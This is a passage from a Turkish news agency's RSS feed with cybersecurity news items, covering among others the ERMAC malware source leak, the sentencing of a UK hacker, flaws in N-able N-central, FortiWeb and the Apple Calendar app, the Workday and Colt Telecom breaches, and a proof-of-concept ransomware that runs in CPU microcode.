<p data-start="1102" data-end="1598"><strong data-start="1102" data-end="1128">Hedefler ve yetenekler</strong><br data-start="1128" data-end="1131">ERMAC’ın yeni sürümü, bankacılık, alışveriş ve kripto para uygulamaları dahil olmak üzere 700’den fazla mobil uygulamayı hedefliyor. Zararlı yazılım; SMS, kişi listesi ve hesap bilgilerini çalabiliyor, Gmail içeriklerine erişebiliyor, sahte bildirimler gösterebiliyor, cihaz kamerasıyla fotoğraf çekebiliyor ve uzaktan uygulama yönetimi yapabiliyor. Ayrıca, cihazdan dosya indirme, çağrı yönlendirme ve SMS gönderme gibi iletişim suiistimali özelliklerine de sahip.</p>
<p data-start="1600" data-end="1967"><strong data-start="1600" data-end="1623">Altyapı zafiyetleri</strong><br data-start="1623" data-end="1626">Hunt.io, sızıntı sayesinde ERMAC’ın canlı komuta-kontrol sunucularını ve operatör panellerini tespit etti. İncelemelerde sabitlenmiş JWT tokenleri, varsayılan kök kullanıcı bilgileri ve korumasız yönetim panelleri gibi ciddi güvenlik açıkları bulundu. Bu durum, altyapının dışarıdan erişime ve manipülasyona açık hale gelmesine neden oldu.</p>
<p data-start="1969" data-end="2347"><strong data-start="1969" data-end="1986">Olası etkiler</strong><br data-start="1986" data-end="1989">Kaynak kod sızıntısının, ERMAC’ı “hizmet olarak kötü amaçlı yazılım” (MaaS) modelinde kullanan suçluların güvenini zedelemesi bekleniyor. Güvenlik çözümlerinin ERMAC’ı daha iyi tespit etmesi mümkün olsa da, kodun diğer tehdit aktörlerinin eline geçmesi durumunda daha gelişmiş ve tespit edilmesi zor yeni varyantların ortaya çıkabileceği değerlendiriliyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>İngiltere’de 3.000’den fazla siteyi hacklediğini iddia eden kişiye 20 ay hapis cezası</title>
<link>https://www.ajansexpres.com.tr/ingilterede-3000den-fazla-siteyi-hackledigini-iddia-eden-kisiye-20-ay-hapis-cezasi</link>
<guid>https://www.ajansexpres.com.tr/ingilterede-3000den-fazla-siteyi-hackledigini-iddia-eden-kisiye-20-ay-hapis-cezasi</guid>
<description><![CDATA[ Rotherham kentinde yaşayan 26 yaşındaki Al-Tahery Al-Mashriky, hükümet siteleri ve haber kuruluşları dahil çok sayıda web sitesini hacklediği, milyonlarca Facebook kullanıcısının verilerini çaldığı ve çeşitli platformlardan kimlik bilgileri elde ettiği suçlamalarını kabul ederek 20 ay hapis cezasına çarptırıldı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cbe807963.webp" length="28352" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:21:43 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="459" data-end="638">İngiltere’de 26 yaşındaki Al-Tahery Al-Mashriky, binlerce web sitesine saldırdığı ve milyonlarca kişiye ait bilgileri çaldığı suçlamalarını kabul ederek 20 ay hapis cezası aldı.</p>
<p data-start="640" data-end="1024"><strong data-start="640" data-end="665">Soruşturmanın geçmişi</strong><br data-start="665" data-end="668">Mashriky, 2022 yılında ABD kolluk kuvvetlerinden gelen bilgiler doğrultusunda İngiltere’de tutuklandı. Mart 2025’te görülen davada suçunu kabul ederek dokuz suçtan hüküm giydi. Suçlamalar arasında Facebook kullanıcılarına ait milyonlarca giriş bilgisinin çalınması, Yemen hükümeti ve İsrail merkezli bir haber sitesi gibi kurumların hacklenmesi yer aldı.</p>
<p data-start="1026" data-end="1425"><strong data-start="1026" data-end="1051">Hedef alınan kurumlar</strong><br data-start="1051" data-end="1054">Adli incelemeler, Yemen Dışişleri Bakanlığı ve Yemen Güvenlik Medya Bakanlığı’nın sitelerine sızıldığını ve bu sitelerde kullanıcı adı tarama araçları yerleştirildiğini ortaya koydu. Ayrıca İsrail’deki <em data-start="1256" data-end="1267">Live News</em> sitesinin yönetici sayfalarına erişildi ve tüm içerik indirildi. ABD ve Kanada’daki dini kuruluşlar ile Kaliforniya Su Kurulu da hedefler arasında bulundu.</p>
<p data-start="1427" data-end="1686"><strong data-start="1427" data-end="1446">Çalınan veriler</strong><br data-start="1446" data-end="1449">Mashriky’nin elinde 4 milyondan fazla Facebook kullanıcısına ait veriler, ayrıca Netflix ve PayPal gibi hizmetlere ait çalıntı kullanıcı bilgileri bulundu. Saldırıların bazılarında web siteleri siyasi ve dini içeriklerle tahrif edildi.</p>
<p data-start="1688" data-end="2035"><strong data-start="1688" data-end="1720">Ulusal Suç Ajansı açıklaması</strong><br data-start="1720" data-end="1723">İngiltere Ulusal Suç Ajansı (NCA) Siber Suç Birimi Başkanı Paul Foster, Mashriky’nin saldırılarının büyük ölçüde kesinti yarattığını belirterek, “Bu saldırılar yalnızca siyasi ve ideolojik mesaj yaymak için yapıldı. Ayrıca milyonlarca kişiyi dolandırmaya imkân sağlayacak kişisel verileri de ele geçirdi” dedi.</p>
<p data-start="2037" data-end="2240"><strong data-start="2037" data-end="2049"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>800’den fazla N&#45;able N&#45;central sunucusu kritik güvenlik açıklarına karşı yamalanmadı, aktif olarak istismar ediliyor</title>
<link>https://www.ajansexpres.com.tr/800den-fazla-n-able-n-central-sunucusu-kritik-guvenlik-aciklarina-karsi-yamalanmadi-aktif-olarak-istismar-ediliyor</link>
<guid>https://www.ajansexpres.com.tr/800den-fazla-n-able-n-central-sunucusu-kritik-guvenlik-aciklarina-karsi-yamalanmadi-aktif-olarak-istismar-ediliyor</guid>
<description><![CDATA[ Yönetilen hizmet sağlayıcılar ve IT ekipleri tarafından kullanılan N-able N-central yazılımındaki iki kritik güvenlik açığının aktif olarak sömürüldüğü doğrulandı. Yamalar yayımlanmasına rağmen hâlâ 800’den fazla sunucu korunmasız durumda. ABD’deki federal kurumlara sistemlerini 20 Ağustos’a kadar güncelleme zorunluluğu getirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cbe39ff6d.webp" length="44426" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:21:39 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="509" data-end="865">Popüler ağ yönetim platformu N-able N-central’da keşfedilen iki kritik güvenlik açığı, dünya genelinde yüzlerce sunucuyu risk altında bırakıyor. CVE-2025-8875 ve CVE-2025-8876 olarak takip edilen açıklar, kimliği doğrulanmış saldırganların komut enjeksiyonu yapmasına ve güvenli olmayan serileştirme zafiyeti üzerinden komut çalıştırmasına imkân tanıyor.</p>
<p data-start="867" data-end="1165"><strong data-start="867" data-end="888">Durumun ciddiyeti</strong><br data-start="888" data-end="891">N-able, açıkların yamalandığını ve 2025.3.1 sürümüyle kapatıldığını duyurdu. Ancak Shadowserver Foundation verilerine göre hâlâ 880 sunucu güncellenmedi. Çoğu ABD, Kanada ve Hollanda’da bulunuyor. Shodan aramalarında internete açık yaklaşık 2.000 N-central örneği görüldü.</p>
<p data-start="1167" data-end="1345">N-able, yaptığı açıklamada güvenlik ihlallerinin yalnızca sınırlı sayıda şirket içi ortamda gözlemlendiğini, kendi bulut ortamlarında ise istismar tespit edilmediğini bildirdi.</p>
<p data-start="1347" data-end="1666"><strong data-start="1347" data-end="1375">CISA’dan zorunlu talimat</strong><br data-start="1375" data-end="1378">ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), açıkları “bilinen istismar edilen güvenlik açıkları” listesine ekledi. Federal kurumların, özellikle İç Güvenlik Bakanlığı, Hazine Bakanlığı ve Enerji Bakanlığı’nın sistemlerini 20 Ağustos’a kadar yamalaması zorunlu hale getirildi.</p>
<p data-start="1668" data-end="1965">CISA, özel sektör kuruluşlarına doğrudan yükümlülük getirmese de tüm ağ yöneticilerini N-able’ın yayımladığı yamaları uygulamaya, aksi halde ürünü devre dışı bırakmaya çağırdı. Açıklamada, “Bu tür açıklar kötü niyetli aktörler için sık kullanılan saldırı vektörleri olmaya devam ediyor” denildi.</p>
<p data-start="1967" data-end="2205"><strong data-start="1967" data-end="1979"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>İK devi Workday, Salesforce tabanlı sosyal mühendislik saldırısıyla gerçekleşen veri ihlalini doğruladı</title>
<link>https://www.ajansexpres.com.tr/ik-devi-workday-salesforce-tabanli-sosyal-muhendislik-saldirisiyla-gerceklesen-veri-ihlalini-dogruladi</link>
<guid>https://www.ajansexpres.com.tr/ik-devi-workday-salesforce-tabanli-sosyal-muhendislik-saldirisiyla-gerceklesen-veri-ihlalini-dogruladi</guid>
<description><![CDATA[ Dünya genelinde 11.000’den fazla kuruma hizmet veren insan kaynakları yazılım şirketi Workday, sosyal mühendislik saldırısı sonucu üçüncü taraf CRM sistemi üzerinden veri ihlaline uğradığını açıkladı. ShinyHunters grubuyla ilişkilendirilen saldırıda müşteri kiracı verilerine erişilmediği belirtilse de iletişim bilgileri açığa çıktı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cbded6b93.webp" length="52028" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:21:34 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="498" data-end="813">ABD’nin California eyaletinde merkezi bulunan Workday, üçüncü taraf müşteri ilişkileri yönetim (CRM) platformuna yönelik bir sosyal mühendislik saldırısında veri ihlali yaşandığını duyurdu. Şirket, olayda müşteri kiracı verilerine erişim sağlanmadığını ancak bazı iş iletişim bilgilerinin sızdırıldığını açıkladı.</p>
<p data-start="815" data-end="1207"><strong data-start="815" data-end="841">Saldırının ayrıntıları</strong><br data-start="841" data-end="844">Workday’in 16 Ağustos’ta yaptığı duyuruya göre saldırganlar, şirket çalışanlarını hedef alan sosyal mühendislik yöntemleriyle CRM platformuna erişim sağladı. Açığa çıkan veriler arasında ad, e-posta adresi ve telefon numaraları gibi bilgilerin bulunduğu belirtildi. Şirket, bu tür bilgilerin sonraki oltalama saldırılarında kullanılabileceği uyarısında bulundu.</p>
<p data-start="1209" data-end="1374">Olayın 6 Ağustos’ta tespit edildiği ve saldırganların kendilerini İK veya BT çalışanı gibi tanıtarak mesaj ve telefon yoluyla bilgi toplamaya çalıştığı bildirildi.</p>
<p data-start="1376" data-end="1784"><strong data-start="1376" data-end="1403">ShinyHunters bağlantısı</strong><br data-start="1403" data-end="1406">Olay, ShinyHunters grubuyla ilişkilendirilen küresel saldırı dalgasının bir parçası. Grup, yıl başından bu yana Salesforce tabanlı CRM sistemlerini hedef alarak kötü amaçlı OAuth uygulamaları üzerinden veritabanlarına erişiyor. Daha önce Adidas, Qantas, Allianz Life, Louis Vuitton, Dior, Tiffany & Co., Chanel ve Google gibi büyük şirketler de benzer saldırılardan etkilendi.</p>
<p data-start="1786" data-end="1965">Çalınan veriler, e-posta yoluyla kurbanlardan fidye talep etmek amacıyla kullanılıyor. ShinyHunters, daha önce Snowflake, AT&T ve PowerSchool saldırılarıyla da gündeme gelmişti.</p>
<p data-start="1967" data-end="2156"><strong data-start="1967" data-end="1979"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>FortiWeb güvenlik açığı tam yetki atlatmaya izin veriyor, araştırmacı istismar kodunu yayımlamaya hazırlanıyor</title>
<link>https://www.ajansexpres.com.tr/fortiweb-guvenlik-acigi-tam-yetki-atlatmaya-izin-veriyor-arastirmaci-istismar-kodunu-yayimlamaya-hazirlaniyor</link>
<guid>https://www.ajansexpres.com.tr/fortiweb-guvenlik-acigi-tam-yetki-atlatmaya-izin-veriyor-arastirmaci-istismar-kodunu-yayimlamaya-hazirlaniyor</guid>
<description><![CDATA[ Fortinet’in web uygulama güvenlik duvarı FortiWeb’de keşfedilen ve CVE-2025-52970 olarak takip edilen kritik açık, saldırganların kimlik doğrulamayı tamamen atlatmasına olanak tanıyor. Araştırmacı Aviv Y, kısmi PoC yayımlarken tam istismar kodunu sistem yöneticilerine güncelleme için süre tanımak amacıyla erteledi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cbdaa18d5.webp" length="41582" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:21:30 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="487" data-end="731">Fortinet’in FortiWeb ürününde bulunan kritik bir güvenlik açığı, saldırganların herhangi bir kullanıcıyı, hatta yöneticileri taklit etmesine imkân tanıyor. CVE-2025-52970 olarak izlenen açık, 12 Ağustos’ta yayımlanan güncelleme ile kapatıldı.</p>
<p data-start="733" data-end="1128"><strong data-start="733" data-end="762">Açığın teknik ayrıntıları</strong><br data-start="762" data-end="765">Araştırmacı Aviv Y tarafından “FortMajeure” adı verilen açık, FortiWeb’in çerez ayrıştırmasındaki “out-of-bounds read” hatasından kaynaklanıyor. Saldırgan, <em data-start="921" data-end="926">Era</em> parametresine beklenmedik bir değer atayarak sunucunun tüm sıfırlardan oluşan gizli anahtarı kullanmasına neden oluyor. Bu durum, sahte kimlik doğrulama çerezlerinin kolayca oluşturulmasını sağlıyor.</p>
<p data-start="1130" data-end="1423">Açığın başarılı şekilde istismar edilmesi için hedef kullanıcının aktif oturum açmış olması gerekiyor. Ardından saldırgan, çerezdeki küçük bir sayısal alanı brute-force yöntemiyle tahmin etmek zorunda. Ancak bu alanın değer aralığının 30’dan küçük olması, saldırıyı pratikte kolaylaştırıyor.</p>
<p data-start="1425" data-end="1559"><strong data-start="1425" data-end="1458">Etkilenen sürümler ve yamalar</strong><br data-start="1458" data-end="1461">Açık, FortiWeb’in 7.0 ile 7.6 arasındaki sürümlerini etkiliyor. Güvenli sürümler ise şu şekilde:</p>
<ul data-start="1561" data-end="1674">
<li data-start="1561" data-end="1588">
<p data-start="1563" data-end="1588">FortiWeb 7.6.4 ve üzeri</p>
</li>
<li data-start="1589" data-end="1616">
<p data-start="1591" data-end="1616">FortiWeb 7.4.8 ve üzeri</p>
</li>
<li data-start="1617" data-end="1645">
<p data-start="1619" data-end="1645">FortiWeb 7.2.11 ve üzeri</p>
</li>
<li data-start="1646" data-end="1674">
<p data-start="1648" data-end="1674">FortiWeb 7.0.11 ve üzeri</p>
</li>
</ul>
<p data-start="1676" data-end="1812">FortiWeb 8.0 sürümleri bu açıktan etkilenmiyor. Fortinet, geçici çözüm bulunmadığını ve tek etkili adımın güncelleme olduğunu duyurdu.</p>
<p data-start="1814" data-end="2099"><strong data-start="1814" data-end="1839">Araştırmacının kararı</strong><br data-start="1839" data-end="1842">Aviv Y, açığın temelini gösteren bir PoC paylaştı, ancak REST endpoint üzerinden yönetici taklidi dışında tüm istismar zincirini yayımlamadı. Tam kodun daha sonra açıklanacağını, böylece sistem yöneticilerine yamaları uygulama süresi tanındığını belirtti.</p>
<p data-start="2101" data-end="2372">Araştırmacıya göre, eksik detaylar bilgili saldırganların bile tek başına tam bir istismar geliştirmesine imkân vermiyor. Ancak duyuruların ardından siber suçluların hızlıca harekete geçtiği düşünüldüğünde, FortiWeb kullanıcılarının derhal güncelleme yapması gerekiyor.</p>
<p data-start="2374" data-end="2562"><strong data-start="2374" data-end="2386"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Colt Telecom saldırısını WarLock fidye yazılım grubu üstlendi, çalınan veriler satışa çıkarıldı</title>
<link>https://www.ajansexpres.com.tr/colt-telecom-saldirisini-warlock-fidye-yazilim-grubu-ustlendi-calinan-veriler-satisa-cikarildi</link>
<guid>https://www.ajansexpres.com.tr/colt-telecom-saldirisini-warlock-fidye-yazilim-grubu-ustlendi-calinan-veriler-satisa-cikarildi</guid>
<description><![CDATA[ İngiltere merkezli Colt Technology Services, 12 Ağustos’ta başlayan siber saldırı nedeniyle Colt Online ve Voice API dahil bazı hizmetlerinde günlerdir kesinti yaşıyor. WarLock grubu saldırıyı üstlenerek finansal, müşteri ve çalışan bilgilerini içeren 1 milyon belgeyi 200 bin dolara satışa çıkardı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cbcf07664.webp" length="35584" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:21:09 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p data-start="455" data-end="699">İngiltere merkezli telekomünikasyon şirketi Colt Technology Services, 12 Ağustos’ta başlayan bir siber saldırının etkilerini gidermeye çalışıyor. Şirket, olayın ardından bazı sistemlerini koruma amacıyla çevrimdışı aldı ve kesintiler sürüyor.</p>
<p data-start="701" data-end="1079"><strong data-start="701" data-end="724">Hizmetlerde kesinti</strong><br data-start="724" data-end="727">Colt’un açıklamasına göre kesintiler; Colt Online, Voice API platformu ve barındırma/numara taşıma hizmetlerini etkiliyor. Müşteri iletişimi çevrimiçi portallar üzerinden sağlanamıyor, yalnızca e-posta ve telefon ile destek veriliyor. Şirket, etkilenen sistemlerin destek hizmetleri olduğunu, temel müşteri ağ altyapısının zarar görmediğini belirtti.</p>
<p data-start="1081" data-end="1498"><strong data-start="1081" data-end="1103">WarLock’un iddiası</strong><br data-start="1103" data-end="1106">‘cnkjasdfgd’ takma adlı bir tehdit aktörü, WarLock fidye yazılım grubu adına saldırıyı üstlendi. Aktör, Colt’tan çalındığını iddia ettiği bir milyon belgeyi 200.000 dolara satışa sundu ve bazı örnek dosyaları yayımladı. İddialara göre dosyalar; finansal veriler, çalışan ve müşteri bilgileri, üst düzey yöneticilere ait veriler, dahili e-postalar ve yazılım geliştirme belgelerini içeriyor.</p>
<p data-start="1500" data-end="1844"><strong data-start="1500" data-end="1524">Olası güvenlik açığı</strong><br data-start="1524" data-end="1527">Siber güvenlik araştırmacısı Kevin Beaumont, saldırganların Microsoft SharePoint’te bulunan ve CVE-2025-53770 olarak izlenen kritik uzaktan kod yürütme açığını kullanmış olabileceğini belirtti. Bu açık en az 18 Temmuz’dan itibaren sıfır gün olarak istismar edilmiş ve Microsoft tarafından 21 Temmuz’da yamalanmıştı.</p>
<p data-start="1846" data-end="1956">Beaumont’a göre saldırganlar yüzlerce gigabaytlık müşteri verisi ve iç dokümanı sistemlerden dışarı çıkardı.</p>
<p data-start="1958" data-end="2237"><strong data-start="1958" data-end="1980">Colt’un açıklaması</strong><br data-start="1980" data-end="1983">Şirket sözcüsü, BleepingComputer’a yaptığı açıklamada, “Siber olayla ilgili iddiaların farkındayız, incelemelerimiz sürüyor. Teknik ekibimiz, üçüncü taraf uzmanlarla birlikte etkilenen sistemleri geri yüklemeye odaklanmış durumda” ifadelerini kullandı.</p>
<p data-start="2239" data-end="2479"><strong data-start="2239" data-end="2251"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>İşlemciye Gizlice Sızan Fidye Yazılımı Geliştirildi: &amp;apos;Format Atmak Çözüm Değil&amp;apos;</title>
<link>https://www.ajansexpres.com.tr/islemciye-gizlice-sizan-fidye-yazilimi-gelistirildi-format-atmak-coezum-degil</link>
<guid>https://www.ajansexpres.com.tr/islemciye-gizlice-sizan-fidye-yazilimi-gelistirildi-format-atmak-coezum-degil</guid>
<description><![CDATA[ Rapid7 uzmanı Christiaan Beek, AMD Zen mimarisindeki kritik bir açığı kullanarak işletim sistemi yeniden yüklense bile aktif kalabilen bir fidye yazılımı geliştirdi. Donanım düzeyinde şifreleme yönetimi yapan bu yeni nesil yazılım, geleneksel tüm güvenlik önlemlerini aşabiliyor ve siber güvenlik dünyasında büyük endişe yaratıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689484b513ce8.webp" length="29826" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:49:25 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>CPU seviyesinde fidye yazılımı nasıl çalışıyor, AMD işlemcilerdeki güvenlik açığı nedir, format atmak neden çözüm olmuyor, donanım güvenliği neden kritik hale geldi</media:keywords>
<content:encoded><![CDATA[<p><br data-start="463" data-end="466"><strong data-start="466" data-end="509">Fidye yazılımı donanım düzeyine taşındı</strong><br data-start="509" data-end="512">Dünyanın ilk işlemci (CPU) seviyesinde çalışan fidye yazılımı ortaya çıktı. Rapid7’nin tehdit analitiği direktörü Christiaan Beek tarafından geliştirilen bu kavramsal yazılım, AMD’nin Zen mimarisinde tespit edilen bir güvenlik açığından faydalanıyor. Bu açık, saldırganların işlemcilere onaysız mikrokod yüklemesine olanak tanıyor.</p>
<p></p>
<p data-start="847" data-end="1279" class=""><strong data-start="847" data-end="900">İmzalanmamış mikrokod yüklemesi mümkün hale geldi</strong><br data-start="900" data-end="903">Google’ın güvenlik araştırmacıları, AMD Zen 1’den Zen 4’e kadar olan işlemcilerde, imzasız mikrokod yamalarının yüklenmesini mümkün kılan bir açığı daha önce tespit etmişti. Bu durumun Zen 5 serisinde de geçerli olduğu sonradan anlaşıldı. Beek, bu açıklardan yola çıkarak, donanım seviyesinde çalışan ve şifreleme işlemlerini yöneten bir fidye yazılımı prototipi geliştirdi.</p>
<p data-start="1281" data-end="1657" class=""><strong data-start="1281" data-end="1344">İşletim sistemi yeniden yüklenince bile etkisini sürdürüyor</strong><br data-start="1344" data-end="1347">Beek’in geliştirdiği yazılım, sistem formatlansa dahi etkisini yitirmiyor. Çünkü yazılım doğrudan işlemcinin mikrokod seviyesinde çalışıyor. Kodun kamuya açıklanmayacağı belirtilse de, böyle bir yazılımın geliştirilmiş olması, benzer saldırıların başkaları tarafından da gerçekleştirilebileceğini gösteriyor.</p>
<p data-start="1659" data-end="1981" class=""><strong data-start="1659" data-end="1710">UEFI içindeki fidye yazılımı planları ifşa oldu</strong><br data-start="1710" data-end="1713">Beek, analizinde 2022 yılında sızdırılan Conti fidye yazılımı çetesine ait sohbet kayıtlarına da değindi. Bu kayıtlarda çete üyeleri, fidye yazılımını UEFI’ye yerleştirme fikrini tartışıyor ve Windows yeniden yüklense bile sistemin şifreli kalmasını hedefliyorlardı.</p>
<p data-start="1983" data-end="2280" class=""><strong data-start="1983" data-end="2021">Donanım güvenliği ön plana çıkıyor</strong><br data-start="2021" data-end="2024">Christiaan Beek, yaşanan gelişmenin ardından donanım güvenliğinin siber savunma stratejilerinin merkezine alınması gerektiğini belirtiyor. Ona göre CPU ve firmware düzeyindeki açıklar kapatılmadıkça, güçlü parolalar ve yazılımsal çözümler yetersiz kalacak.</p>
<p data-start="2282" data-end="2465" class=""><strong data-start="2282" data-end="2294"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Apple Takvim Uygulamasında Zero&#45;Click Açığı: Hiç Tıklamadan Sistem Ele Geçirilebiliyor</title>
<link>https://www.ajansexpres.com.tr/apple-takvim-uygulamasinda-zero-click-acigi-hic-tiklamadan-sistem-ele-gecirilebiliyor</link>
<guid>https://www.ajansexpres.com.tr/apple-takvim-uygulamasinda-zero-click-acigi-hic-tiklamadan-sistem-ele-gecirilebiliyor</guid>
<description><![CDATA[ Apple’ın macOS ve iOS sistemlerinde yer alan Takvim uygulamasında, kullanıcı etkileşimine gerek kalmadan sistem kontrolü sağlayan kritik bir güvenlik açığı keşfedildi. CVE-2022-46723 koduyla tanımlanan bu açık, zararlı takvim davetleri üzerinden çalışıyor ve siber güvenlik araştırmacısı Ebubekir Bastama’ya göre güncelleme yapılmamış cihazlarda halen aktif biçimde sömürülebiliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689484b1edab1.webp" length="9494" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:49:21 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Zero-click açığı nedir, CVE-2022-46723 hangi cihazları etkiliyor, Apple Takvim açığı nasıl çalışıyor, güncelleme yapılmazsa ne olur</media:keywords>
<content:encoded><![CDATA[<p data-start="507" data-end="919" class=""><strong data-start="528" data-end="597">Apple’ın Takvim uygulamasında kritik güvenlik açığı tespit edildi</strong><br data-start="597" data-end="600">CVE-2022-46723 koduyla kayda geçen güvenlik açığı, Apple’ın Takvim (Calendar) uygulamasında yer alıyor. Bu açık, saldırganların yalnızca zararlı bir takvim daveti göndererek hedef sistemde herhangi bir kullanıcı etkileşimine gerek kalmadan dosya yazmasına, silmesine ve tam sistem kontrolü elde etmesine olanak tanıyor.</p>
<p data-start="921" data-end="1323" class=""><strong data-start="921" data-end="957">Zero-Click özelliğiyle çalışıyor</strong><br data-start="957" data-end="960">Söz konusu açık, ‘zero-click’ olarak adlandırılan ve kullanıcıdan hiçbir etkileşim gerektirmeyen saldırı türlerinden biri. Zararlı .ics uzantılı bir takvim dosyasıyla bu açığın tetiklenebildiğini aktaran siber güvenlik araştırmacısı <strong data-start="1193" data-end="1213">Ebubekir Bastama</strong>, açığın çalışması için hedefin gelen takvim davetlerini otomatik kabul etmesinin yeterli olduğunu belirtiyor.</p>
<p data-start="1325" data-end="1640" class=""><strong data-start="1325" data-end="1359">Açık eski ancak hâlâ tehlikeli</strong><br data-start="1359" data-end="1362">Ebubekir Bastama’ya göre, her ne kadar bu açık 2022 yılında keşfedilip Apple tarafından düzeltme yayınlanmış olsa da, güncelleme yapılmamış bazı cihazlarda bu zafiyet aktif olarak sömürülebiliyor. Özellikle eski iOS ve macOS sürümlerini kullanan kullanıcılar ciddi risk altında.</p>
<p data-start="1642" data-end="1898" class=""><strong data-start="1642" data-end="1674">Hangi sistemler etkileniyor?</strong><br data-start="1674" data-end="1677">Bu güvenlik açığı, Apple’ın macOS ve iOS işletim sistemlerinde geçerli. Windows ve Android sistemlerde benzeri bir açık henüz tespit edilmedi. Otomatik takvim davetlerini kabul eden cihazlar ise özellikle hedef konumunda.</p>
<p data-start="1900" data-end="2009" class=""><strong data-start="1900" data-end="1932">Saldırganlar ne yapabiliyor?</strong><br data-start="1932" data-end="1935">Açığın istismarıyla saldırganlar aşağıdaki işlemleri gerçekleştirebiliyor:</p>
<ul data-start="2011" data-end="2219">
<li data-start="2011" data-end="2055" class="">
<p data-start="2013" data-end="2055" class="">Dosya sistemine yazma ve silme işlemleri</p>
</li>
<li data-start="2056" data-end="2101" class="">
<p data-start="2058" data-end="2101" class="">Uzak kod çalıştırma (RCE) yetkisi kazanma</p>
</li>
<li data-start="2102" data-end="2151" class="">
<p data-start="2104" data-end="2151" class="">SMB bağlantıları yoluyla Gatekeeper’ı atlatma</p>
</li>
<li data-start="2152" data-end="2219" class="">
<p data-start="2154" data-end="2219" class="">iCloud senkronizasyonunu kullanarak kişisel fotoğraflara erişme</p>
</li>
</ul>
<p data-start="2221" data-end="2296" class="">Tüm bu işlemler, kullanıcıdan herhangi bir onay alınmaksızın yapılabiliyor.</p>
<p data-start="2298" data-end="2600" class=""><strong data-start="2298" data-end="2318">Nasıl korunmalı?</strong><br data-start="2318" data-end="2321">Ebubekir Bastama, bu tür saldırılardan korunmak için cihazların güncel tutulması gerektiğini vurguluyor. Ayrıca Takvim uygulamasında “otomatik davet kabulü” özelliği kapatılmalı, bilinmeyen kişilerden gelen davetler açılmamalı ve dosya sistemi düzenli olarak kontrol edilmelidir.</p>
<p data-start="2602" data-end="2872" class=""><strong data-start="2602" data-end="2658">Uyarı: Güncelleme yapılmayan cihazlar tehdit altında</strong><br data-start="2658" data-end="2661">Bastama, bu tür açıkların yaygınlaşmadan önce fark edilip giderilmesinin büyük veri sızıntılarının önüne geçtiğini ve güncelleme almayan cihazların halen aktif olarak bu zafiyetten etkilenebileceğini belirtiyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Siber güvenlik uzmanı Ebubekir Bastama: &amp;apos;RD Gateway açığı saldırganlara tam erişim izni verebilir&amp;apos;</title>
<link>https://www.ajansexpres.com.tr/siber-guvenlik-uzmani-ebubekir-bastama-rd-gateway-acigi-saldirganlara-tam-erisim-izni-verebilir</link>
<guid>https://www.ajansexpres.com.tr/siber-guvenlik-uzmani-ebubekir-bastama-rd-gateway-acigi-saldirganlara-tam-erisim-izni-verebilir</guid>
<description><![CDATA[ CVE-2025-21297 kodlu kritik güvenlik açığı, Windows Server sistemlerinde kullanılan RD Gateway bileşenini hedef alıyor. Siber güvenlik araştırmacısı Ebubekir Bastama, açığın başarılı bir şekilde kullanılması halinde &#039;saldırganların sistem üzerinde tam kontrol elde edebileceğini&#039; belirtti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689484ac83dbf.webp" length="39706" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:49:15 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>sibergüvenlik</media:keywords>
